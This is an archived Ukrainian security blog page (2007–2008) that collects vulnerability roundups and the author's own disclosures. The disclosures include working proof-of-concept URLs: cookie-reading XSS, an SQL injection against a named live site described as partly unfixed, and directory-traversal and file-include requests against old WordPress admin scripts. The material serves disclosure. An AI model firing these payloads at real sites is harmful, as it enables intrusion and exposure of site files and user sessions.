Архів для категорії 'Уразливості'

Добірка уразливостей

16:30 03.01.2008

В даній добірці уразливості в веб додатках:

  • DoS Vulnerability in Konqueror 3.5.7 (деталі)
  • nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability (деталі)
  • ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities (деталі)
  • XSS in [Calendar Express 2 ] (деталі)
  • XSS in [deskpro.com v1.1.0 ] (деталі)
  • Vulnerability in MOHA Chat (деталі)
  • Cross-site scripting (XSS) vulnerability in @Mail (деталі)
  • New links2 packages fix arbitrary shell command execution (деталі)
  • Пустий пароль для входу в WebAdmin в MailEnable (деталі)
  • Multiple PHP remote file inclusion vulnerabilities in phpProfiles (деталі)
  • Cross-site request forgery (CSRF) vulnerability in urlobox in MKPortal (деталі)
  • Vulnerability in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
  • Міжсайтовий скриптінг в TikiWiki (деталі)
  • Обхід каталогу в JBoss DeploymentFileRepository (деталі)
  • Міжсайтовий скриптінг і SQL-ін’єкція в ClickGallery (деталі)

Cross-Site Scripting уразливості в AwesomeTemplateEngine

23:51 02.01.2008

В жовтні, 31.10.2007, я знайшов Cross-Site Scripting уразливості в AwesomeTemplateEngine.

Уразливості в файлі example_template.php в параметрах data[title], data[message], data[table][1][item], data[table][1][url] та data[poweredby]. Атака можлива при включених register globals.

XSS:

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливості на miranda.org.ua

19:22 02.01.2008

29.07.2007

У лютому, 05.02.2007, я знайшов Cross-Site Scripting, SQL Injection та Full path disclosure уразливості на проекті http://miranda.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

02.01.2008

XSS:

SQL Injection:

http://miranda.org.ua/plugins/1%20or%201=1/*

Full path disclosure:

http://miranda.org.ua/index.php?name=1 (виправлена)

Частина уразливостей досі не виправлена.

Святкова уразливість на jokesland.net.ru

22:47 31.12.2007

В зв’язку з Новим Роком, що скоро наступить, пропоную вам два цікавих поздоровлення в якості невеличкого подарунку ;-) .

Поздоровлення №1

Поздоровлення №2

А також повідомляю, що 25.12.2007, я знайшов Cross-Site Scripting уразливість на проекті jokesland.net.ru. Тому самому, де і знаходиться це веселе новорічне поздоровлення :-) .

XSS:

Добірка уразливостей

16:52 31.12.2007

В даній добірці уразливості в веб додатках:

  • Vulnerability in Joomla! (деталі)
  • Cross-site scripting (XSS) vulnerability in cPanel WebHost Manager (деталі)
  • Apple Safari on MacOSX may reveal user’s saved passwords (деталі)
  • safari’s saved password at risk (деталі)
  • Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability (деталі)
  • CodeAvalanche News SQL Injection (деталі)
  • nabopoll 1.2 Remote Unprotected Admin Section Vulnerability (деталі)
  • Переповнення буфера в AT-TFTP Server (деталі)
  • Vulnerability in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
  • New squirrelmail packages fix cross-site scripting (деталі)
  • Міжсайтовий скриптінг в iNews Publisher (деталі)
  • Міжсайтовий скриптінг в mmgallery (деталі)
  • PHP remote file inclusion vulnerability in cwmCounter (деталі)
  • PHP remote file inclusion vulnerability in Paristemi 0.8.3 (деталі)
  • SQL-ін’єкція в Basic Forum (деталі)

Local file include, Directory traversal та Full path disclosure в WordPress

23:43 30.12.2007

Продовжу оприлюднювати численні уразливості в WP в День багів в WordPress. Про деякі подібні уразливості я писав раніше.

В грудні, 22.12.2007, я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметрі page), а також в файлах admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Local file include та Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Arbitrary file edit, Local file include, Directory traversal та Full path disclosure в WordPress

22:52 30.12.2007

Сьогодні, в День багів в WordPress, я оприлюднюю численні уразливості в WP. Про деякі подібні уразливості я писав раніше.

В грудні, 02.12.2007 (в templates.php) і 22.12.2007, я знайшов Arbitrary file edit, Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлі templates.php (в параметрах file та page) та файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php та page-new.php (в параметрі page).

Full path disclosure:

http://site/wp-admin/templates.php?file= (працює тільки в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Local file include та Directory traversal:

http://site/wp-admin/templates.php?page=\..\..\file.php
http://site/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Нові Local file include, Directory traversal та Full path disclosure в WordPress

23:54 29.12.2007

В жовтні, 31.10.2007 (в edit.php), і в листопаді, 29.11.2007 (в admin.php), я знайшов нові Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах edit.php та admin.php в параметрі page.

Full path disclosure:

http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Добірка уразливостей

16:37 29.12.2007

В даній добірці уразливості в веб додатках:

  • XSS in JBoss Portal (деталі)
  • Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability (деталі)
  • Radical Technologies - Portal Search - multiple XSS issue (деталі)
  • Jportal 2.3.1 CSRF vulnerability (деталі)
  • DotClear Full Path Disclosure Vulnerability (деталі)
  • SQL injection in mosgetparam implementation in Joomla! (деталі)
  • Vulnerability in Joomla! (деталі)
  • PHP remote file inclusion vulnerability in Azucar CMS 1.3 (деталі)
  • Cross-site scripting (XSS) vulnerability in Knusperleicht ShoutBox 2.6 (деталі)
  • Vulnerability in Bandwebsite (aka Bandsite portal system) 1.5 (деталі)
  • PHP-інклюдинг в site_news (деталі)
  • Міжсайтовий скриптінг в Ace Helpdesk (деталі)
  • PHP remote file inclusion vulnerability in PowerClan (деталі)
  • CRLF injection vulnerability in Oracle Portal 10g (деталі)
  • Декілька уразливостей в Sisfo Kampus (деталі)

Local file include, Directory traversal та Full path disclosure в WordPress

23:50 28.12.2007

В червні, 09.06.2007 (в admin.php) і 15.06.2007 (в themes.php), я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах admin.php (параметр import) та themes.php (параметр page).

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess

В файлі admin.php через параметр import можна лише підключити файли з php розширенням.

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).